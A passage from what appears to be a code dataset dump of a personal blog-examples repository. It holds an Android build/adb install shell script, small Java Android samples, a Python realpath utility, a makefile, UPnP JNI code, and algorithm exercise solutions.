is_the_system_bin_file()\n{\n local dir_bin=`dirname $1`\n local tmp_str=`basename $dir_bin`\n if [ ! $tmp_str = \"bin\" ];then\n echo \"it's not a bin file!\"\n return 1\n fi\n\n tmp_str=`dirname $dir_bin`\n tmp_str=`basename $tmp_str`\n if [ ! $tmp_str = \"system\" ]; then\n echo \"it's not in system dir!\"\n return 1\n fi\n return 0\n}\n\n# $1: the input file path\nfunction get_push_path()\n{\n if echo $1 | grep -qE \"/system/\";then\n echo $1 | perl -pe 's/.*(\\/system\\/.*)/\\1/'\n fi\n}\n\n# $1: the path to AndroidManifest.xml\nfunction get_manifest_package_name()\n{\n local package=`ParseAndroidManifest.pl < $1`\n echo $package\n}\n\nfunction is_apk_file()\n{\n local apk_file=$1\n if ! echo $apk_file | grep -qE \"apk$\"; then\n# echo \"$apk_file is not apk file!\"\n return 1\n fi\n\n if [ ! -f $apk_file ]; then\n echo \"$apk_file doesn't exist!\"\n return 1\n fi\n return 0\n}\n\n# $1: input file name\nfunction is_exe_or_so_file()\n{\n local exe_so_file=$1\n\n if [ ! -f $exe_so_file ]; then\n echo \"$exe_so_file doesn't exist!\"\n return 1\n fi\n\n if echo $exe_so_file | grep -qE \"\\.so$\"; then\n# echo \" `basename $exe_so_file` is a .so file!\"\n return 0\n else\n if [ -x $exe_so_file ]; then\n# echo \"$exe_so_file is a executable file!\"\n return 0\n fi\n fi\n\n echo \"$exe_so_file is not a executable or so file\"\n return 1\n}\n\n# $1: input file name\nfunction is_jar_package()\n{\n local jar_file=$1\n\n if [ ! -f $jar_file ]; then\n echo \"$jar_file doesn't exist!\"\n return 1\n fi\n\n if echo $jar_file | grep -qE \"\\.jar$\"; then\n# echo \" `basename $jar_file` is a .so file!\"\n return 0\n else\n if [ -x $jar_file ]; then\n# echo \"$jar_file is a executable file!\"\n return 0\n fi\n fi\n\n echo \"$jar_file is not a jar package file\"\n return 1\n}\n\n\n\n# $1: the file need to be installed\nfunction install_droid_apk()\n{\n local apk_file=$1\n if ! is_apk_file $apk_file; then\n exit 198\n fi\n\n local package=$(get_manifest_package_name ./AndroidManifest.xml)\n\n echo \"try uninstall $package\"\n $ADB uninstall $package\n\n if ! $ADB install $apk_file; then\n echo \"failed to install $package\"\n exit 198\n fi\n\n echo \"adb install $apk_file ok!\"\n}\n\nfunction adb_do_remount()\n{\n if ! $ADB remount 2>&1>/dev/null; then\n echo \"remount /system with RW failed!\"\n return 1\n else\n return 0\n fi\n}\n\n# $1: the file need to be installed\nfunction install_droid_exe_or_so_file()\n{\n local theFile=$1\n if [ \"$1X\" = \"X\" ]; then\n echo \"null input file!\"\n exit 99\n fi\n\n local dstPushPath=$(get_push_path $theFile)\n if [ \"X$dstPushPath\" = \"X\" ]; then\n if echo $theFile | grep -qE \"linux-x86\"; then\n echo \"$theFile is belong to local host on x86\"\n exit 0\n else\n echo \"$theFile is not a file in system dir!\"\n return 0\n fi\n fi\n \n if ! adb_do_remount; then\n exit 100\n fi\n\n if ! adb_do_install $theFile $dstPushPath; then\n exit 123\n fi \n return 0\n}\n\n# $1: the file to install\n# $2: to where it will be installed\nfunction adb_do_install()\n{\n local theFile=$1\n local dstPushPath=$2\n\n if $ADB push $theFile $dstPushPath>/dev/null 2>&1; then\n# if echo \"just a test\"; then\n printf '[OK] %-40s ==> %-50s\\n' \"`basename $theFile`\" \"$dstPushPath\"\n if echo \"$dstPushPath\" | grep -qE '/system/bin/'; then\n local run_cmd=\"adb shell /system/bin/`basename $theFile`\"\n printf \"$run_cmd\\n\"\n fi\n return 0\n fi \n echo \"Failed: adb push $theFile $dstPushPath\"\n return 1\n}\n\nfunction install_jar_package()\n{\n local theFile=$1\n if [ \"$1X\" = \"X\" ]; then\n echo \"null input file!\"\n exit 99\n fi\n\n local dstPushPath=$(get_push_path $theFile)\n if [ \"X$dstPushPath\" = \"X\" ]; then\n if echo $theFile | grep -qE \"linux-x86\"; then\n echo \"$theFile is belong to local host on x86\"\n exit 0\n else\n echo \"$theFile is not a file in system dir!\"\n return 0\n fi\n fi\n \n if ! adb_do_remount; then\n exit 100\n fi\n\n if ! adb_do_install $theFile $dstPushPath; then\n exit 100\n fi\n\n return 0\n\n}\n\nfunction install_droid_module()\n{\n local theFile=$1\n if [ \"X$theFile\" = \"X\" ];then\n echo \"maybe it's a compile error!\"\n exit 100\n fi\n\n theFile=$TOP_DIR/$theFile\n if [ ! -f $theFile ]; then\n echo \"the file $theFile doesn't exist!!\"\n exit 100\n fi\n\n if is_apk_file $theFile;then\n install_droid_apk $theFile;\n return 0\n fi\n\n if is_exe_or_so_file $theFile; then\n install_droid_exe_or_so_file $theFile\n return 0\n fi\n\n if is_jar_package $theFile; then\n install_jar_package $theFile\n return 0\n fi\n\n echo \"UNKNOW file: $theFile\"\n exit 89\n}\n\n\nfunction my_mm()\n{\n if [ \"$TOP_DIR\" ]; then\n cd $(Gettop)/build\n source ./envsetup.sh\n cd -\n mm $1\n else\n echo \"Couldn't locate the top of the tree. Try setting TOP.\"\n fi\n}\n\nfunction start_build()\n{\n T=$(Gettop)\n if [ \"$TOP_DIR\" ]; then\n cd $(Gettop)/build\n source ./envsetup.sh\n cd -\n local exe_name=$1\n shift\n echo \"before execute $exe_name PWD:$PWD\"\n if ! $exe_name $@ showcommands | tee /tmp/BuildP1000.log; then\n echo \"build error, pleas check it!\"\n exit 10\n else\n if [ \"X$TARGET_SIMULATOR\" = \"X\" ]; then\n echo \"\"\n echo \"\"\n cat /tmp/BuildP1000.log | grep Install:|sed -e 's/Install: //'>/tmp/EBuild.txt\n while read line\n do\n# install_droid_module $line\n echo $line\n done </tmp/EBuild.txt\n else\n echo \"==== SIMULATOR build ok ====\"\n fi\n fi\n else\n echo \"Couldn't locate the top of the tree. Try setting TOP.\"\n fi\n\n}\n\n\nfunction main()\n{\n if [ -f AndroidManifest.xml ] && [ -f build.xml ] && [ -f local.properties ]; then\n ant clean && ant debug install\n else\n start_build mmm\n fi\n}\n\necho \"================ $0\" \n\nPROG=`basename $0`\n\ncase $PROG in\n MMM)\n start_build mmm $@\n ;;\n MM)\n start_build mm\n ;;\n *)\n echo \"Usage: MMM | MM\"\n exit 3\n ;;\nesac\n" }, { "alpha_fraction": 0.733021080493927, "alphanum_fraction": 0.733021080493927, "avg_line_length": 20.350000381469727, "blob_id": "b0058c688ae9641805deed73f428818cbd10f29b", "content_id": "f7419c73350ac7ef27a120993de3541f64a8d85b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 427, "license_type": "permissive", "max_line_length": 59, "num_lines": 20, "path": "/android/touch_events/src/com/rmd/touchevent/MyViewGroup.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.touchevent;\n\nimport android.content.Context;\nimport android.util.AttributeSet;\nimport android.widget.LinearLayout;\nimport android.view.MotionEvent;\n\npublic class MyViewGroup extends LinearLayout\n{\n public MyViewGroup(Context context, AttributeSet attrs)\n {\n super(context, attrs);\n }\n\n @Override\n public boolean onInterceptTouchEvent(MotionEvent event)\n {\n return false;\n }\n}\n" }, { "alpha_fraction": 0.600671112537384, "alphanum_fraction": 0.6065436005592346, "avg_line_length": 31.216217041015625, "blob_id": "8d60fdee7ce12975623a99d79b2473c51c734708", "content_id": "99eeb07b34c3acc6bfe08933ae559c26823049d6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1192, "license_type": "permissive", "max_line_length": 78, "num_lines": 37, "path": "/tools/realpath.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os import path\nfrom optparse import OptionParser\nimport subprocess\nimport sys\n\n__VERSION__ = '1.0.0'\n\ndef copy_sys_clipboard(real_path):\n # copy with pbcopy command on osx\n proc = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n proc.communicate(real_path)\n\ndef main(options, file_to_check):\n if path.exists(file_to_check):\n real_path = path.realpath(file_to_check)\n if options.copy:\n copy_sys_clipboard(real_path)\n if sys.stdout.isatty():\n real_path = real_path + '\\n'\n sys.stdout.write(real_path)\n else:\n sys.stderr.write(file_to_check+\" doesn't exist\\n\")\n\nif __name__ == \"__main__\":\n opt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"get real path of specified file\",\n usage = \"%prog [-c] file_to_check\")\n opt_parser.add_option(\"-c\", \"--copy\", action=\"store_true\", default=False, \n help=\"copy output to system clipboard\")\n (cmdline_options, args) = opt_parser.parse_args()\n if len(args) != 1:\n opt_parser.print_usage()\n sys.exit(0)\n main(cmdline_options, args[0])\n" }, { "alpha_fraction": 0.7096219658851624, "alphanum_fraction": 0.7136311531066895, "avg_line_length": 24.31884002685547, "blob_id": "ccf890c5fbaddb3dd6f68d7585028bdbde8b795f", "content_id": "8a43fb5de511d7f5c8bf870c1c7e5a69d8bc14d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1746, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/android/rpc-with-service/app1/src/com/rmd/App1Main.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd;\n\nimport android.app.Activity;\nimport android.content.ComponentName;\nimport android.content.Context;\nimport android.content.Intent;\nimport android.content.ServiceConnection;\nimport android.os.Bundle;\nimport android.os.IBinder;\nimport android.os.RemoteException;\nimport android.util.Log;\nimport android.view.View;\nimport android.widget.Button;\n\npublic class App1Main extends Activity {\n\n\tISvcController svc = null;\n\tServiceConnection con = null;\n\n\t/** Called when the activity is first created. */\n\t@Override\n\tpublic void onCreate(Bundle savedInstanceState) {\n\t\tsuper.onCreate(savedInstanceState);\n\t\tsetContentView(R.layout.main);\n\n\t\tcon = new ServiceConnection() {\n\n\t\t\t@Override\n\t\t\tpublic void onServiceDisconnected(ComponentName name) {\n\t\t\t\tLog.v(\"App1\", \"App1Main Service Disconnected.\");\n\t\t\t}\n\n\t\t\t@Override\n\t\t\tpublic void onServiceConnected(ComponentName name, IBinder service) {\n\t\t\t\tLog.v(\"App1\", \"App1Main Service Connected.\");\n\t\t\t\tLog.v(\"App1\", service.getClass().toString() + \"\\t hash code: \"\n\t\t\t\t\t\t+ service.hashCode());\n\t\t\t\tsvc = ISvcController.Stub.asInterface(service);\n\t\t\t}\n\t\t};\n\n\t\tButton btnStartSvc = (Button) findViewById(R.id.btnStartSvc);\n\t\tbtnStartSvc.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\tIntent i = new Intent(\"com.rmd.app2svc\");\n\t\t\t\tv.getContext().bindService(i, con, Context.BIND_AUTO_CREATE);\n\t\t\t}\n\t\t});\n\n\t\tButton btnCallRPC = (Button) findViewById(R.id.btnCallRPC);\n\t\tbtnCallRPC.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\ttry {\n\t\t\t\t\tsvc.foo(\"hello\");\n\t\t\t\t\tsvc.bar(\"raymond\");\n\t\t\t\t} catch (RemoteException ex) {\n\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\t}\n\t\n\t@Override\n\tprotected void onStop() {\n\t\tunbindService(con);\n\t\tsuper.onStop();\n\t}\n\n}" }, { "alpha_fraction": 0.6457990407943726, "alphanum_fraction": 0.6457990407943726, "avg_line_length": 18.901639938354492, "blob_id": "0051db0efe3766d7c960b10c320b7cf870d7b2a6", "content_id": "2547e08831684459c7af7494f4e86679929d04f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 61, "num_lines": 61, "path": "/android/exosip_sample/libexosip/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\ttools/sip_reg.c \\\n\t\tsrc/eXtl.c \\\n\t\tsrc/eXsubscription_api.c \\\n\t\tsrc/eXregister_api.c \\\n\t\tsrc/jevents.c \\\n\t\tsrc/jcallback.c \\\n\t\tsrc/eXtl_tcp.c \\\n\t\tsrc/rijndael.c \\\n\t\tsrc/jreg.c \\\n\t\tsrc/sdp_offans.c \\\n\t\tsrc/eXconf.c \\\n\t\tsrc/jauth.c \\\n\t\tsrc/udp.c \\\n\t\tsrc/eXcall_api.c \\\n\t\tsrc/eXtl_tls.c \\\n\t\tsrc/jdialog.c \\\n\t\tsrc/eXtransport.c \\\n\t\tsrc/eXosip.c \\\n\t\tsrc/jrequest.c \\\n\t\tsrc/jsubscribe.c \\\n\t\tsrc/eXtl_dtls.c \\\n\t\tsrc/jcall.c \\\n\t\tsrc/misc.c \\\n\t\tsrc/milenage.c \\\n\t\tsrc/jresponse.c \\\n\t\tsrc/eXmessage_api.c \\\n\t\tsrc/eXtl_udp.c \\\n\t\tsrc/eXoptions_api.c \\\n\t\tsrc/eXinsubscription_api.c \\\n\t\tsrc/eXutils.c \\\n\t\tsrc/eXrefer_api.c \\\n\t\tsrc/jpipe.c \\\n\t\tsrc/jpublish.c \\\n\t\tsrc/eXpublish_api.c \\\n\t\tsrc/jnotify.c \\\n\t\tsrc/inet_ntop.c\n\nLOCAL_CFLAGS += -DHAVE_TIME_H \\\n\t\t\t\t-DHAVE_SYS_SELECT_H \\\n\t\t\t\t-DENABLE_TRACE \\\n\t\t\t\t-DOSIP_MT\n\nLOCAL_C_INCLUDES:= $(LOCAL_PATH)/include $(LOCAL_PATH)/src #\\\n\t$(LOCAL_PATH)/../libosip/include\nLOCAL_EXPORT_C_INCLUDES:=$(LOCAL_C_INCLUDES)\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip \n\n#LOCAL_LDLIBS += -lpthread -ldl\n\nLOCAL_PRELINK_MODULE := false\n\nLOCAL_MODULE:= libexosip\n\ninclude $(BUILD_SHARED_LIBRARY)\n$(call import-module,libosip)\n" }, { "alpha_fraction": 0.30816325545310974, "alphanum_fraction": 0.35986393690109253, "avg_line_length": 23.915254592895508, "blob_id": "d7a7b3f07005e010403e753d69a08af0f7d9a67d", "content_id": "487334191cf79d55a7586471ff7e918df9af4eef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 88, "num_lines": 59, "path": "/algorithm/interview/nth_large_number.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: nth_large_number.cpp\n// \n// Description: let f=2^i*3^j*5^k\n// given number n, output the nth large number generated by f\n// for instance: n = 18, output 30, which is the 18th number in \n// sequence 1 2 3 4 5 6 8 9 10 12 15 16 18 20 24 25 27 30\n// \n// Version: 1.0\n// Created: 08/15/2011 03:03:24 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n#include\t<iostream>\n#include\t<stdlib.h>\n\nusing namespace std;\nstatic const int MAX = 10000;\n\nint get_next(int *a, int n)\n{\n int r = n>0?a[n-1]*2:1;\n int i = n-1;\n for(i = n - 1; i >= 0; --i)\n {\n int t = 2*a[i];\n if(t > a[n-1] && t < r)\n r = t;\n t = 3*a[i];\n if(t > a[n-1] && t < r)\n r = t;\n t = 5*a[i];\n if(t < a[n-1])\n break;\n if(t > a[n-1] && t < r)\n r = t;\n }\n return r;\n}\n\nint main ( int argc, char *argv[] )\n{\n int a[MAX], n;\n n = atoi(argv[1]);\n for(int i = 0; i < n; ++i)\n {\n a[i] = get_next(a, i);\n }\n for(int i = 0; i < n; ++i)\n cout << a[i] << ' ';\n cout << endl;\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.664016604423523, "alphanum_fraction": 0.6683949828147888, "avg_line_length": 29.667844772338867, "blob_id": "6877de824ff043f7a5a1261ae990afefc4971fad", "content_id": "023a5b2b1b7b365710eb33bab9ca3c06361a55bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8679, "license_type": "permissive", "max_line_length": 154, "num_lines": 283, "path": "/android/pupnp_jni/jni/upnp_jni.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: upnp_jni.c\n// \n// Description: \n// \n// Version: 1.0\n// Created: 02/25/2012 03:03:51 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<jni.h>\n#include\t<android/log.h>\n#include\t\"upnp.h\"\n#include\t\"Discovery.h\"\n#include\t\"ActionRequest.h\"\n#include\t\"ActionComplete.h\"\n#include\t\"StateVarRequest.h\"\n#include\t\"StateVarComplete.h\"\n#include\t\"SubscriptionRequest.h\"\n#include\t\"Event.h\"\n#include\t\"EventSubscribe.h\"\n#include\t\"poison.h\"\n\n#define LOG_TAG \"libtupnp\"\n#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)\n#define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)\n\nint TvDeviceCallbackEventHandler(Upnp_EventType EventType, const void *Event, void *Cookie)\n{\n\tswitch (EventType) {\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\tcase UPNP_DISCOVERY_SEARCH_RESULT:\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE:\n\tcase UPNP_CONTROL_ACTION_COMPLETE:\n\tcase UPNP_CONTROL_GET_VAR_COMPLETE:\n\tcase UPNP_EVENT_RECEIVED:\n\tcase UPNP_EVENT_RENEWAL_COMPLETE:\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\t\tbreak;\n\tdefault:\n\t LOGI(\"Error in TvDeviceCallbackEventHandler: unknown event type %d\\n\",\n\t\t EventType);\n\t}\n\treturn 0;\n}\n\nvoid SampleUtil_PrintEventType(Upnp_EventType S)\n{\n\tswitch (S) {\n\t/* Discovery */\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\t\tLOGI(\"UPNP_DISCOVERY_ADVERTISEMENT_ALIVE\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE:\n\t\tLOGI(\"UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_SEARCH_RESULT:\n\t\tLOGI( \"UPNP_DISCOVERY_SEARCH_RESULT\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\t\tLOGI( \"UPNP_DISCOVERY_SEARCH_TIMEOUT\\n\");\n\t\tbreak;\n\t/* SOAP */\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\t\tLOGI(\"UPNP_CONTROL_ACTION_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_ACTION_COMPLETE:\n\t\tLOGI(\"UPNP_CONTROL_ACTION_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\t\tLOGI(\"UPNP_CONTROL_GET_VAR_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_GET_VAR_COMPLETE:\n\t\tLOGI(\"UPNP_CONTROL_GET_VAR_COMPLETE\\n\");\n\t\tbreak;\n\t/* GENA */\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIPTION_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_RECEIVED:\n\t\tLOGI(\"UPNP_EVENT_RECEIVED\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_RENEWAL_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_RENEWAL_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIBE_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_UNSUBSCRIBE_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_AUTORENEWAL_FAILED:\n\t\tLOGI(\"UPNP_EVENT_AUTORENEWAL_FAILED\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_SUBSCRIPTION_EXPIRED:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIPTION_EXPIRED\\n\");\n\t\tbreak;\n\t}\n}\n\nint TvCtrlPointCallbackEventHandler(Upnp_EventType EventType, const void *Event, void *Cookie)\n{\n\tint errCode = 0;\n\n LOGI(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ TvCtrlPointCallbackEventHandler event type: %d\\n\",\n\t\t EventType);\n SampleUtil_PrintEventType(EventType);\n\tswitch ( EventType ) {\n\t/* SSDP Stuff */\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\tcase UPNP_DISCOVERY_SEARCH_RESULT: \n {\n\t\tconst UpnpDiscovery *d_event = (UpnpDiscovery *)Event;\n\t\tIXML_Document *DescDoc = NULL;\n\t\tconst char *location = NULL;\n\t\tint errCode = UpnpDiscovery_get_ErrCode(d_event);\n\n\t\tif (errCode != UPNP_E_SUCCESS) {\n\t\t\tLOGI(\"Error in Discovery Callback -- %d\\n\", errCode);\n\t\t}\n\n\t\tlocation = UpnpString_get_String(UpnpDiscovery_get_Location(d_event));\n\t\terrCode = UpnpDownloadXmlDoc(location, &DescDoc);\n\t\tif (errCode != UPNP_E_SUCCESS) {\n\t\t\tLOGI(\"Error obtaining device description from %s -- error = %d\\n\",\n\t\t\t\tlocation, errCode);\n\t\t} else {\n//\t\t\tTvCtrlPointAddDevice(\n//\t\t\t\tDescDoc, location, UpnpDiscovery_get_Expires(d_event));\n\t\t}\n\t\tif (DescDoc) {\n\t\t\tixmlDocument_free(DescDoc);\n\t\t}\n//\t\tTvCtrlPointPrintList();\n\t\tbreak;\n\t}\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\t\t/* Nothing to do here... */\n\t\tbreak;\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE: \n// {\n//\t\tUpnpDiscovery *d_event = (UpnpDiscovery *)Event;\n//\t\tint errCode = UpnpDiscovery_get_ErrCode(d_event);\n//\t\tconst char *deviceId = UpnpString_get_String(\n//\t\tUpnpDiscovery_get_DeviceID(d_event));\n//\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Discovery ByeBye Callback -- %d\\n\", errCode);\n//\t\t}\n//\t\tSampleUtil_Print(\"Received ByeBye for Device: %s\\n\", deviceId);\n//\t\tTvCtrlPointRemoveDevice(deviceId);\n//\t\tSampleUtil_Print(\"After byebye:\\n\");\n//\t\tTvCtrlPointPrintList();\n//\t\tbreak;\n//\t}\n\t/* SOAP Stuff */\n\tcase UPNP_CONTROL_ACTION_COMPLETE: \n// {\n//\t\tUpnpActionComplete *a_event = (UpnpActionComplete *)Event;\n//\t\tint errCode = UpnpActionComplete_get_ErrCode(a_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\"Error in Action Complete Callback -- %d\\n\",\n//\t\t\t\terrCode);\n//\t\t}\n//\t\t/* No need for any processing here, just print out results.\n//\t\t * Service state table updates are handled by events. */\n//\t\tbreak;\n//\t}\n//\tcase UPNP_CONTROL_GET_VAR_COMPLETE: {\n//\t\tUpnpStateVarComplete *sv_event = (UpnpStateVarComplete *)Event;\n//\t\tint errCode = UpnpStateVarComplete_get_ErrCode(sv_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Get Var Complete Callback -- %d\\n\", errCode);\n//\t\t} else {\n//\t\t\tTvCtrlPointHandleGetVar(\n//\t\t\t\tUpnpString_get_String(UpnpStateVarComplete_get_CtrlUrl(sv_event)),\n//\t\t\t\tUpnpString_get_String(UpnpStateVarComplete_get_StateVarName(sv_event)),\n//\t\t\t\tUpnpStateVarComplete_get_CurrentVal(sv_event));\n//\t\t}\n//\t\tbreak;\n//\t}\n\t/* GENA Stuff */\n\tcase UPNP_EVENT_RECEIVED: \n// {\n//\t\tUpnpEvent *e_event = (UpnpEvent *)Event;\n//\t\tTvCtrlPointHandleEvent(\n//\t\t\tUpnpEvent_get_SID_cstr(e_event),\n//\t\t\tUpnpEvent_get_EventKey(e_event),\n//\t\t\tUpnpEvent_get_ChangedVariables(e_event));\n//\t\tbreak;\n//\t}\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_RENEWAL_COMPLETE: \n// {\n//\t\tUpnpEventSubscribe *es_event = (UpnpEventSubscribe *)Event;\n//\n//\t\terrCode = UpnpEventSubscribe_get_ErrCode(es_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Event Subscribe Callback -- %d\\n\", errCode);\n//\t\t} else {\n//\t\t\tTvCtrlPointHandleSubscribeUpdate(\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_SID(es_event)),\n//\t\t\t\tUpnpEventSubscribe_get_TimeOut(es_event));\n//\t\t}\n//\t\tbreak;\n//\t}\n\tcase UPNP_EVENT_AUTORENEWAL_FAILED:\n\tcase UPNP_EVENT_SUBSCRIPTION_EXPIRED: \n// {\n//\t\tUpnpEventSubscribe *es_event = (UpnpEventSubscribe *)Event;\n//\t\tint TimeOut = default_timeout;\n//\t\tUpnp_SID newSID;\n//\n//\t\terrCode = UpnpSubscribe(\n//\t\t\tctrlpt_handle,\n//\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t&TimeOut,\n//\t\t\tnewSID);\n//\t\tif (errCode == UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\"Subscribed to EventURL with SID=%s\\n\", newSID);\n//\t\t\tTvCtrlPointHandleSubscribeUpdate(\n//\t\t\t\tUpnpString_get_String(UpnpEventSubscribe_get_PublisherUrl(es_event)),\n//\t\t\t\tnewSID,\n//\t\t\t\tTimeOut);\n//\t\t} else {\n//\t\t\tSampleUtil_Print(\"Error Subscribing to EventURL -- %d\\n\", errCode);\n//\t\t}\n//\t\tbreak;\n//\t}\n\t/* ignore these cases, since this is not a device */\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\t\tbreak;\n\t}\n\n\treturn 0;\n}\n\nint Java_com_rmd_tpupnp_Main_startUpnp(JNIEnv* env, jobject thiz)\n{\n const char* ip_address = \"0.0.0.0\";\n const int port = 7080;\n int rc = UpnpInit(ip_address, port);\n LOGI(\"UpnpInit returns %s %d\", \"hello\", rc);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n\n UpnpDevice_Handle device_handle = -1;\n// rc = UpnpRegisterRootDevice(\"http://pupnp.git.sourceforge.net/git/gitweb.cgi?p=pupnp/pupnp;a=blob_plain;f=upnp/sample/web/tvdevicedesc.xml;hb=HEAD\",\n// TvDeviceCallbackEventHandler, &device_handle, &device_handle);\n rc = UpnpRegisterClient(TvCtrlPointCallbackEventHandler, &device_handle, &device_handle);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n rc = UpnpSearchAsync(device_handle, 5, \"urn:schemas-upnp-org:device:tvdevice:1\", NULL);\n\tif (UPNP_E_SUCCESS != rc) {\n\t\treturn 1;\n\t}\n\n\n// rc = UpnpSendAdvertisement(device_handle, 100 /* seconds */);\n if(UPNP_E_SUCCESS != rc)\n return 1;\n else\n return 0;\n}\n" }, { "alpha_fraction": 0.4216082692146301, "alphanum_fraction": 0.4505839943885803, "avg_line_length": 24.586206436157227, "blob_id": "d39fe9d588e4d4e3f006bb581ae57e952975c8dc", "content_id": "eaf34e6d329ecbeabaed454aa256462a387381b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4469, "license_type": "permissive", "max_line_length": 192, "num_lines": 174, "path": "/algorithm/codeforces/2/2b.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://codeforces.com/problemset/problem/2/B\n *\n * B. The least round way\n * time limit per test5 seconds\n * memory limit per test64 megabytes\n * inputstandard input\n * outputstandard output\n * There is a square matrix n × n, consisting of non-negative integer numbers. You should find such a way on it that\n *\n * starts in the upper left cell of the matrix;\n * each following cell is to the right or down from the current cell;\n * the way ends in the bottom right cell.\n * Moreover, if we multiply together all the numbers along the way, the result should be the least \"round\". In other words, it should end in the least possible number of zeros.\n *\n * Input\n * The first line contains an integer number n (2 ≤ n ≤ 1000), n is the size of the matrix. Then follow n lines containing the matrix elements 